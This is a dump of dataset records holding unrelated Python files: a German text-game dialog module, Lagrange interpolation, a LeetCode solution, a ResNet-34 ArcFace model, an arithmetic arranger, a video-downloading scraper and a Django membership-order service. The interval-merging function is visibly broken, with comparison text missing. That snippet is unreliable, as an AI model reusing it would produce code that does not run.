self.log_event('Du bist durch ein Loch gefallen')\n self.player.position.level -= 1\n return self\n\n\nclass LadderDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.upwards = True\n self.question = ''\n self.options = ['[J] Ja', '[N] Nein']\n self.initialized = False\n self.setup()\n\n def print(self):\n if not self.initialized:\n if self.upwards:\n self.question = 'Du hast eine Leiter nach oben gefunden. ' \\\n 'Willst du sie herauf klettern?'\n else:\n self.question = 'Du hast eine Leiter nach unten gefunden. ' \\\n 'Willst du sie hinab kletern?'\n self.setup()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n if self.upwards:\n globals.MAP.log_event('Du bist eine Leiter hinaufgestiegen')\n globals.MAP.player.position.level += 1\n if globals.MAP.player.level not in globals.MAP.stories_shown:\n globals.MAP.stories_shown.add(globals.MAP.player.level)\n globals.STORY.text = \\\n globals.STORY.stories[str(globals.MAP.player.level)]\n return globals.STORY\n return globals.MAP\n else:\n globals.MAP.log_event('Du bist eine Leiter hinabgestiegen')\n globals.MAP.player.position.level -= 1\n return globals.MAP\n elif key == ord('n'):\n self.initialized = False\n return globals.MAP\n previous.print()\n return self\n\n\nclass SaveGameDialog(Dialog):\n \"\"\"\n Dialog when accessing a save point\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.question = \"Du kannst deinen Spielstand speichern. \" \\\n \"Dein vorheriger Spielstand wird ueberschrieben. \" \\\n \"Bist du dir sicher?\"\n self.options = [\"[J] Ja\", \"[N] Nein\"]\n self.setup()\n\n def handle(self, key: int, previous=None):\n if key == ord('n'):\n globals.MAP.log_event('Du hast das Spiel nicht gespeichert')\n return globals.MAP\n elif key in (ord('j'), constants.ENTER):\n globals.MAP.save_game()\n globals.MAP.log_event('Du hast das Spiel gespeichert')\n return globals.MAP\n globals.MAP.print()\n return self\n\n\nclass MonsterDialog(Dialog):\n \"\"\"\n Dialog when encountering a monster\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.options = [\"[ENTER] OK\"]\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous=None):\n if key == constants.ENTER:\n self.initialized = False\n return globals.MAP\n globals.MAP.print()\n return self\n\n def initialize(self):\n player = globals.MAP.player\n monster = globals.MAP.monsters[(player.level,\n *globals.MAP.current_position)]\n\n self.question = f'Du kaempfst gegen das Monster:\\n{monster}\\n' \\\n f'Staerke: {monster.strength}'\n\n if player.strength >= monster.strength:\n self.question += '\\nUnd du besiegst es!'\n globals.MAP.log_event(f'{monster.name.title()} wurde besiegt!')\n globals.MAP.current_value = ' '\n globals.MAP.levels[player.level][globals.MAP._last_position[1]][\n globals.MAP._last_position[0]] = 'I'\n globals.MAP.items[(player.level, *globals.MAP._last_position)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(player.level + 1)\n else:\n damage = int(player.strength / monster.strength * player.strength)\n self.question += '\\nUnd das Monster besiegt dich...'\n self.question += f'\\nDu hast {damage} Schaden ausgeteilt'\n globals.MAP.log_event(f'{monster.name.title()} '\n f'hat dich besiegt...')\n globals.MAP.player.damage += monster.strength - player.strength\n globals.MAP.monsters[(player.level, player.x,\n player.y)].strength -= damage\n\n globals.MAP.player.position._x, globals.MAP.player.position._y = \\\n globals.MAP.starting_positions[player.level]\n self.setup()\n\n\nclass ItemDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.item = None\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n globals.MAP.player.add_item(self.item)\n globals.MAP.current_value = ' '\n globals.MAP.log_event(f'Du hast {self.item} aufgenommen')\n return previous\n if key == ord('n'):\n self.initialized = False\n globals.MAP.log_event(f'Du hast {self.item} liegen lassen')\n return previous\n previous.print()\n return self\n\n def initialize(self):\n self.item = globals.MAP.items[(globals.MAP.player.level,\n *globals.MAP.current_position)]\n\n self.question = 'Du hast einen Gegenstand gefunden!\\n' \\\n f'Name: {self.item}\\n' \\\n f'Staerke: {self.item.factor}'\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n other_item = None\n if self.item.type == 'Kopf':\n other_item = globals.MAP.player.head\n elif self.item.type == 'Brust':\n other_item = globals.MAP.player.chest\n elif self.item.type == 'Beine':\n other_item = globals.MAP.player.legs\n elif self.item.type == 'Fuesse':\n other_item = globals.MAP.player.feet\n elif self.item.type == 'Waffe':\n other_item = globals.MAP.player.weapon\n elif self.item.type == 'Keks' and len(globals.MAP.player.cookies) > 2:\n other_item = globals.MAP.player.cookies[0]\n if other_item:\n self.question += f'\\nDu hast bereits diesen Gegenstand:\\n' \\\n f'Name: {other_item}\\n' \\\n f'Staerke: {other_item.factor}'\n self.options[0] = '[J] Austauschen'\n self.setup()\n\n\nclass GameOverDialog(Dialog):\n def __init__(self):\n super().__init__()\n self.question = 'Du bist gestorben\\nGame Over'\n self.options = ['[O] OK']\n self.setup()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key == ord('o'):\n globals.MAP = GameMap()\n return globals.MAIN\n previous.print()\n return self\n","sub_path":"src/game_map.py","file_name":"game_map.py","file_ext":"py","file_size_in_byte":24793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"73003329","text":"from functools import reduce\n\nfrom modules import utils\n\n\ndef lambda_eval(i, lst, p, flag=False):\n \"\"\" Lagrange interpolation\n return lambda(0)\n \"\"\"\n num = []\n den = []\n for element in lst:\n if element != i:\n num.append(element)\n den.append(element - i)\n\n eval_num = reduce(lambda x, y: x * y, num)\n eval_den = reduce(lambda x, y: x * y, den)\n\n if not flag:\n if eval_den < 0:\n eval_den = p - abs(eval_den)\n\n return (eval_num * utils.mult_inv(eval_den, p)) % p\n\n return eval_num * p // eval_den # p is delta\n\n\ndef reconstruct_secret(dict, p):\n sum = 0\n for node, share in dict.items():\n sum += lambda_eval(node, dict.keys(), p) * share\n\n return sum % p\n","sub_path":"modules/lagr_interpolate.py","file_name":"lagr_interpolate.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"477949135","text":"\n# 方法一:通过滑动窗口的方法实现\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n if not s:\n return 0\n \n left = 0\n # set() 函数创建一个无序不重复元素集,可进行关系测试,删除重复数据,还可以计算交集、差集、并集等。\n lookup = set() \n n = len(s)\n max_len = 0\n cur_len = 0\n for i in range(n):\n cur_len += 1\n while s[i] in lookup:\n lookup.remove(s[left])\n left += 1\n cur_len -= 1\n if cur_len > max_len:\n max_len = cur_len\n lookup.add(s[i])\n return max_len\n\n\n# 方法二:通过哈希表的方法实现\n# class Solution(object):\n# def lengthOfLongestSubstring(self, s):\n# \"\"\"\n# :type s: str\n# :rtype: int\n# \"\"\"\n# dic = {}\n# l, res = 0, 0\n# for r in range(len(s)):\n# if s[r] in dic:\n# l = max(dic[s[r]], l)\n# dic[s[r]] = r + 1\n# res = max(res, r - l + 1)\n# return res\n\n\nif __name__ == '__main__':\n sovle = Solution()\n print(sovle.lengthOfLongestSubstring('abcabcbb'))\n ","sub_path":"1-20/003-无重复字符的最长子串/3_lengthOfLongestSubstring.py","file_name":"3_lengthOfLongestSubstring.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"293659342","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 20 20:28:41 2018\n\n@author: junyang\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom net_ArcFace import ArcFace\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.bn0 = nn.BatchNorm2d(inplanes,eps=1e-03) \n self.conv1 = conv3x3(inplanes, planes, 1)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.relu = nn.PReLU()\n self.conv2 = conv3x3(planes, planes, stride)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n out =self.bn0(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n #out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4,eps=1e-03)\n self.relu = nn.PReLU()\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64,eps=1e-03)\n self.relu = nn.PReLU()\n #self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], stride=2)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.bn2 = nn.BatchNorm2d(512,eps=1e-03)\n self.dropout = nn.Dropout2d(p=0.4, inplace=True)\n self.fc1 = nn.Linear(512 * 7 * 7, 512)\n self.bn3 = nn.BatchNorm1d(512,eps=1e-03)\n self.fc2 = ArcFace(512,num_classes)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion,eps=1e-03),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, label):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n #x = self.maxpool(x)\n\n x = self.layer1(x)\n #print('layer1: ',x.size())\n x = self.layer2(x)\n #print('layer2: ',x.size())\n x = self.layer3(x)\n #print('layer3: ',x.size())\n x = self.layer4(x)\n #print('layer4: ',x.size())\n\n x = self.bn2(x)\n x = self.dropout(x)\n #print('dropout: ',x.size())\n x = x.view(x.size(0),-1)\n x = self.fc1(x)\n #print('fc1: ',x.size())\n x = self.bn3(x)\n x = self.fc2(x,label)\n #print('fc2: ',x.size())\n\n return x\n\n\n\n\ndef resnet34(**kwargs):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n return model\n\n\"\"\"\na = resnet34()\nprint(a)\nfrom torch.autograd import Variable\nx = Variable(torch.randn(20,3,224,224))\nout = a(x)\n\"\"\"\n","sub_path":"Resnet34_test_cfp/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"349413969","text":"def sort(List):\n k=len(List)-1\n insert=k\n for i in range(len(List)-2):\n if List[i][0]List[k][0]:\n insert=i+1\n lis=List[k]\n for i in range(insert+1,len(List)):\n List[len(List)+insert-i]=List[len(List)+insert-i-1]\n List[insert]=lis\n return List\n\ndef Func(List):\n for i in range(len(List)):\n for j in range(i+1,len(List)):\n if List[i][0]<=List[j][0] and List[j][1]<=List[i][1]:\n List.remove(List[j])\n return Func(List)\n if List[j][0]<=List[i][0] and List[j][1]>=List[i][1]:\n List.remove(List[i])\n return Func(List)\n if List[i][0]<=List[j][1] and List[i][1]>=List[j][0]:\n if List[i][0] 4 or len(problem[2]) > 4:\n raise BaseException\n except:\n return \"Error: Numbers cannot be more than four digits.\"\n\n #Check if operator is valid\n try:\n if problem[1] != '+' and problem[1] != '-':\n raise BaseException\n except:\n return \"Error: Operator must be '+' or '-'.\"\n\n #Return True if data is validated\n return True\n\ndef arithmetic_arranger(problems, showAnswer=False):\n arranged_problems = 0\n line1=line2=line3=line4 = \"\"\n problem_gap = \" \" * 4 \n #Check Problem Count\n try:\n if len(problems) > 5:\n raise BaseException\n except:\n return \"Error: Too many problems.\"\n\n #Handle each problem\n for problem in problems:\n part = problem.split()\n #Validate problems\n valid = validate_data(part)\n if valid != True:\n return valid\n\n #Arrange Problems \n space = max(len(part[0]),len(part[2])) + 2\n if len(line1) > 0:\n line1 += problem_gap\n line2 += problem_gap\n line3 += problem_gap\n\n line1 += part[0].rjust(space)\n line2 += part[1] + part[2].rjust(space-1)\n line3 += '-' * (space)\n\n #If showAnswer is true\n if showAnswer:\n #Perform math\n if part[1] == '+':\n solution = int(part[0]) + int(part[2])\n else:\n solution = int(part[0]) - int(part[2])\n \n if len(line4) > 0:\n line4 += problem_gap\n line4 += str(solution).rjust(space)\n\n #Return Arranged Problems\n arranged_problems = f\"{line1}\\n{line2}\\n{line3}\"\n if showAnswer:\n arranged_problems += f\"\\n{line4}\"\n return arranged_problems","sub_path":"arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"536997664","text":"# class Linyu(object):\n#\n# hobby = 'mmp'\n#\n# def __init__(self, name, age, weight):\n# self.name = name\n# self._age = age\n# self.__weight = weight\n#\n#\n# @classmethod#调用的时候用类名 , 而不是某个对象\n# def get_hobby(cls):\n# return cls.hobby\n#\n#\n# @property #像访问属性一样 调用方法\n# def get_weight(self):\n# return self.__weight\n#\n#\n# def self_intro(self):\n# print('My name is %s \\n I am %s years old \\n' % (self.name, self._age))\n#\n#\n#\n#\n# if __name__ == '__main__':\n# linyu = Linyu('石世伟', '20', '65')\n# print(dir(linyu))\n# print(linyu.get_hobby())\n# print(linyu.get_weight)\n# linyu.self_intro()\n# encoding:utf-8\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.pool import Pool\n\n\nclass MaiZi():\n def __init__(self):\n self.url = 'http://www.maiziedu.com/course/957/ '\n\n # 解析url的函数\n def parse_next_url(self):\n request = requests.get(self.url)\n request.encoding = request.apparent_encoding\n for url in BeautifulSoup(request.text, 'lxml').select('ul.lesson-lists li a'):\n next_url = 'http://www.maiziedu.com/ ' + url['href']\n yield next_url\n\n # 解析内容的url\n def parse_content(self, url):\n request = requests.get(url)\n request.encoding = request.apparent_encoding\n demo = '\\$lessonUrl = \"(.*?)\"'\n de = re.compile(demo, re.S)\n url_next = de.findall(request.text)[0]\n content = requests.get(url_next).content\n title = BeautifulSoup(request.text, 'lxml').select('span.selected')[0]['name']\n print(title)\n with open('D:\\\\' + title + '.mp4', 'wb') as e:\n e.write(content)\n\n # 线程\n def parse_pool(self):\n pool = Pool(2)\n pool.map(self.parse_content, self.parse_next_url())\n\n\nif __name__ == '__main__':\n Run = MaiZi()\n Run.parse_pool()\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"494540410","text":"import collections\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom django.core.cache import cache\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\nfrom django.db.models import Prefetch\n\nfrom upday.models import StudentAssociatorShip, Associator, AssociatorOrder, UserCard, AssociatorEntry, Project, Coupon, \\\n StudentCouponShip, PunchRecord\nfrom upday.modules.channel.service.project_channel_service import ProjectChannelService\nfrom upday.modules.common.service.cache_service import key_handler\nfrom upday.modules.common.service.datetime_service import DatetimeService\nfrom upday.modules.common.service.encrypt_service import EncryptService\nfrom upday.modules.common.service.file_service import FileService\nfrom upday.modules.common.service.url_service import UrlService\nfrom upday.modules.tasker.rule import scheduler\nfrom upday.modules.wechat.service.message_service import MessageService\nfrom upday.modules.wechat.service.order_service import OrderService\nfrom upday.modules.channel.service.channel_service import ChannelService\n\n\nclass AssociatorService:\n\n def create(self, team):\n associator = Associator(\n team=team\n )\n associator.save()\n return associator\n\n def bind(self, student, associator):\n try:\n ship = StudentAssociatorShip.objects.get(student=student, associator=associator)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n ship = StudentAssociatorShip(student=student, associator=associator)\n ship.save()\n ship.exit_time = ship.join_time + timedelta(days=365)\n ship.save()\n return True\n # 学生是否曾参加会员但已过期失效\n if AssociatorService().is_expired_ship(ship):\n now = DatetimeService.now()\n ship.join_time = now\n ship.exit_time = now + timedelta(days=365)\n ship.save()\n return True\n ship_id = StudentAssociatorShip.objects.filter(student=student, associator=associator)[0].id\n ship_id = EncryptService().encrypt_id('HASH_KEY_STUDENT_ASSOCIATOR_ID', ship_id)\n msg = 'The StudentAssociatorShip is existed, id: ' + str(ship_id)\n raise Exception(msg)\n\n def get_student_usercard_set(self, student):\n # 取出该学生已参加的所有会员项目,预加载出项目、punchrecord_list(按两种不同的条件取出,并起了别名all_punchrecord_list和finished_punchrecord_list,set变成了list)\n my_project_list = []\n usercard_set = student.usercard_set.filter(status=1).select_related('project').prefetch_related(\n Prefetch('punchrecord_set', to_attr='all_punchrecord_list'),\n Prefetch('punchrecord_set', queryset=PunchRecord.objects.exclude(status=0), to_attr='finished_punchrecord_list'))\n for usercard in usercard_set:\n my_project_list.append(usercard.project)\n return my_project_list, usercard_set\n\n def get_final_url_from_entry(self, is_associator, entry, my_project_list, usercard_set):\n # 若学生没参加会员,url传空字符串\n if is_associator == 0:\n url = ''\n has_joined = 0\n return url, has_joined\n # 若学生参加了会员,无论是否过期,都返回条目详情。\n # 若条目绑定了project,传project的url;若无,传link;若都无,传空字符串。\n current_project = entry.project\n if current_project:\n url = ChannelService.get_common_channel_link('', EncryptService().encrypt_id('HASH_KEY_PROJECT_ID',\n current_project.id))\n if current_project in my_project_list:\n has_joined = 1\n user_card = usercard_set.get(project=entry.project)\n punch_day = len(user_card.all_punchrecord_list)\n real_punch_day = len(user_card.finished_punchrecord_list)\n if punch_day == real_punch_day:\n has_joined = 2\n else:\n has_joined = 0\n return url, has_joined\n entry_link = entry.link\n if entry_link != '':\n url = entry_link\n has_joined = 0\n return url, has_joined\n return '', 0\n\n def get_associator_entry_list(self, associator_album, is_associator, my_project_list, usercard_set):\n associator_entry_list = []\n # 取出会员专辑内所有项目\n for associator_entry in associator_album.associatorentry_set.select_related('project').order_by('position'):\n picture = FileService().sign_url(associator_entry.picture)\n url, has_joined = self.get_final_url_from_entry(\n is_associator=is_associator,\n entry=associator_entry,\n my_project_list=my_project_list,\n usercard_set=usercard_set,\n )\n dict = {\n 'url': url,\n 'has_joined': has_joined,\n 'name': associator_entry.name,\n 'price': associator_entry.price,\n 'picture': picture,\n 'introduce': associator_entry.introduce,\n }\n associator_entry_list.append(dict)\n return associator_entry_list\n\n # 根据name查询会员是否存在\n def is_existed(self, name):\n return Associator.objects.filter(name=name).count() > 0\n\n def send_bind_associator_message(self, name, time_end, associator_id, openid):\n # 延时发消息\n scheduler.event_bound_associator(openid, associator_id)\n encrypt_handler = EncryptService()\n associator_id = encrypt_handler.encrypt_id('HASH_KEY_ASSOCIATOR_ID', associator_id)\n url = ChannelService().get_associator_link(associator_id)\n message_handler = MessageService()\n # 获取模板信息\n template_data, template_id = message_handler.get_bind_associator_template(name, time_end)\n # 发送模板消息\n message_handler.send_template(user_id=openid, template_id=template_id,\n data=template_data, url=url)\n\n # 更新会员信息\n def update_associator(self, validated_data):\n associator = validated_data['associator']\n associator.name = validated_data['name']\n associator.present_price = validated_data['present_price']\n associator.origin_price = validated_data['origin_price']\n if validated_data['picture']:\n associator.picture = validated_data['picture']\n if validated_data['voice']:\n associator.voice = validated_data['voice']\n if validated_data['qrcode']:\n associator.qrcode = validated_data['qrcode']\n if validated_data['benefit']:\n associator.benefit = validated_data['benefit']\n if validated_data['introduction']:\n associator.introduction = validated_data['introduction']\n if validated_data['training']:\n associator.training = validated_data['training']\n associator.save()\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n return associator\n\n # 查询某种特定会员ID的学生数量\n def count_join_num(self, associator):\n return StudentAssociatorShip.objects.filter(associator=associator).count()\n\n # 删除会员(注意:已经有人报名的会员不能通过此接口删除)\n def delete_associator(self, associator):\n if associator.students.count() >= 1:\n msg = 'Warning! There are some students join this associator, you can not delete it'\n raise Exception(msg)\n else:\n associator.delete()\n\n # 查询团队中的会员列表\n def find_all_associator(self, team):\n associator_set = Associator.objects.filter(team=team).order_by('-create_time')\n return associator_set\n\n def get_associator(self, validated_data):\n instance = Associator.objects.get(id=validated_data['associator_id'])\n return instance\n\n def is_order_exists(self, out_trade_no, openid, total_fee, trade_type):\n try:\n order = AssociatorOrder.objects.get(out_trade_no=out_trade_no, pay_status=0)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n return False\n return order\n # if order.student.openid == openid and int(order.total_fee * 100) == int(\n # total_fee) and order.trade_type == trade_type:\n # return order\n # else:\n # return False\n\n def get_associator_list(self, student):\n \"\"\"\n 为什么先算学生的会员,自己慢慢体会\n :param student:\n :return:\n \"\"\"\n return student.associator_set.prefetch_related('associatoralbum_set__associatorentry_set')\n\n def complete_order(self, order, transaction_id, time_end, is_subscribe, bank_type, settlement_total_fee, fee_type):\n order.transaction_id = transaction_id\n order.time_end = time_end\n order.is_subscribe = is_subscribe\n order.bank_type = bank_type\n order.settlement_total_fee = settlement_total_fee\n order.fee_type = fee_type\n order.pay_status = 1\n order.save()\n return True\n\n # 解绑通过会员免费报名的项目\n def unbind_project(self, project_list, student, time_end):\n \"\"\"\n :param upday_id: 所有的orion_upday_item_id\n :param uid:\n :param time_end: AssociatorOrder表里的time_end(支付完成时间)时间戳,为防止将购买会员之前就已经购买的项目也\\\n 删除掉,通过时间筛选掉这部分,只将参加会员后的会员项目解绑。\n :return:\n \"\"\"\n for project in project_list:\n target_card = UserCard.objects.filter(project=project, create_at__gt=time_end, student=student)\n target_card.update(status=0)\n pass\n\n def clear_associator_detail_cache(self, associator):\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n\n def is_expired_ship(self, ship):\n # 会员的失效时间\n # expire_time_stamp = DatetimeService.get_timestamp_from_utc_datetime(expire_time)\n # 会员是否已过期失效\n # now_stamp = DatetimeService.get_current_timestamp()\n if ship.exit_time < DatetimeService.now():\n return True\n else:\n return False\n\n def is_associator_expired(self, associator, student):\n try:\n student_associator_ship = StudentAssociatorShip.objects.get(associator=associator, student=student)\n except ObjectDoesNotExist:\n msg = {'result': 'No such a student_associator_ship'}\n raise Exception(msg, code='validation')\n except MultipleObjectsReturned:\n msg = {'result': 'Multiple student_associator_ship'}\n raise Exception(msg, code='validation')\n return self.is_expired_ship(student_associator_ship)\n\n def get_joined_associator_list(self, student_associator_ship_set):\n associator_list = []\n for ship in student_associator_ship_set:\n dict = {\n 'associator_id': EncryptService().encrypt_id('HASH_KEY_ASSOCIATOR_ID', ship.associator.id),\n 'name': ship.associator.name\n }\n associator_list.append(dict)\n return associator_list\n\n #################################################################################\n # 以下为生成商户订单功能\n #################################################################################\n\n # 商户订单的out_trade_no\n def create_out_trade_no(self):\n order_service_handler = OrderService()\n return order_service_handler.generate_out_trade_no()\n\n # 商户订单中的商品描述\n def create_body(self, associator):\n name = associator.name\n price = associator.present_price\n body = \"\"\"声德:{associator_name}(¥{associator_price})\"\"\".format(\n associator_name=name,\n associator_price=price\n )\n return body\n\n # 获得回调url\n def get_wechat_pay_notify_url(self):\n return 'https://' + settings.OPEN_UPDAY_DOMAIN + '/media-platform/associator/pay-callback'\n # return 'http://milk345.imwork.net:45992/api/associator/pay-callback'\n\n # 生成ip\n def get_client_ip(self, request):\n try:\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n except Exception:\n ip = '0.0.0.0'\n return ip\n\n # 下载订单Excel\n def generate_order_excel(self, order_list):\n matrix = []\n for order_info in order_list:\n translated_info = collections.OrderedDict()\n order_id = order_info['order_id']\n associator_id = order_info['associator_id']\n user_id = order_info['user_id']\n nickname = order_info['nickname']\n associator_name = order_info['associator_name']\n total_fee = order_info['total_fee']\n refund_status = order_info['refund_status']\n refund_time = order_info['refund_time']\n time_end = order_info['time_end']\n if refund_time:\n refund_time = DatetimeService.get_represent_from_timestamp(refund_time)\n else:\n refund_time = ''\n if time_end:\n time_end = DatetimeService.get_represent_from_timestamp(time_end)\n else:\n time_end = ''\n channel = order_info['channel']\n refund_operator = order_info['refund_operator']\n refund_reason = order_info['refund_reason']\n translated_info['订单号'] = order_id\n translated_info['会员ID'] = associator_id\n translated_info['用户ID'] = user_id\n translated_info['用户昵称'] = nickname\n translated_info['会员身份'] = associator_name\n translated_info['订单金额'] = total_fee\n translated_info['退款状态'] = refund_status\n translated_info['退款时间'] = refund_time\n translated_info['支付时间'] = time_end\n translated_info['报名渠道'] = channel\n translated_info['退款人'] = refund_operator\n translated_info['退款原因'] = refund_reason\n matrix.append(translated_info)\n file_handler = FileService()\n return file_handler.create_downloadable_excel(matrix)\n\n # 按照特定的昵称,会员身份,订单金额等条件去查询\n def search_order(self, order_set, nickname, associator_name, total_fee, refund_status, refund_time_scope,\n pay_time_scope, channel, refund_operator):\n if nickname:\n order_set = self.search_order_by_nickname(order_set, nickname)\n if associator_name:\n order_set = self.search_order_by_associator_name(order_set, associator_name)\n if total_fee:\n order_set = self.search_order_by_total_fee(order_set, total_fee)\n if pay_time_scope:\n order_set = self.search_order_by_pay_time(order_set, pay_time_scope)\n if channel:\n order_set = self.search_order_by_channel(order_set, channel)\n if refund_operator:\n order_set = self.search_order_by_operator(order_set, refund_operator)\n if refund_status == 1:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n if refund_time_scope:\n order_set = self.search_order_by_refund_time(order_set, refund_time_scope)\n if refund_status == 0:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n\n return order_set\n\n def search_order_by_nickname(self, original_order_set, nickname):\n return original_order_set.filter(student__nickname=nickname)\n\n def search_order_by_associator_name(self, original_order_set, associator_name):\n return original_order_set.filter(associator__name=associator_name)\n\n def search_order_by_total_fee(self, original_order_set, total_fee):\n return original_order_set.filter(total_fee=total_fee)\n\n def search_order_by_refund_status(self, original_order_set, refund_status):\n return original_order_set.filter(refund_status=refund_status)\n\n def search_order_by_channel(self, original_order_set, channel):\n return original_order_set.filter(channel__mark=channel)\n\n def search_order_by_operator(self, original_order_set, refund_operator):\n return original_order_set.filter(refund_operator__username=refund_operator)\n\n def search_order_by_refund_time(self, original_order_set, refund_time_scope):\n return original_order_set.filter(refund_time__range=(refund_time_scope[0], refund_time_scope[1]))\n\n def search_order_by_pay_time(self, original_order_set, pay_time_scope):\n return original_order_set.filter(time_end__range=(pay_time_scope[0], pay_time_scope[1]))\n","sub_path":"upday/modules/associator/service/associator_service.py","file_name":"associator_service.py","file_ext":"py","file_size_in_byte":17640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
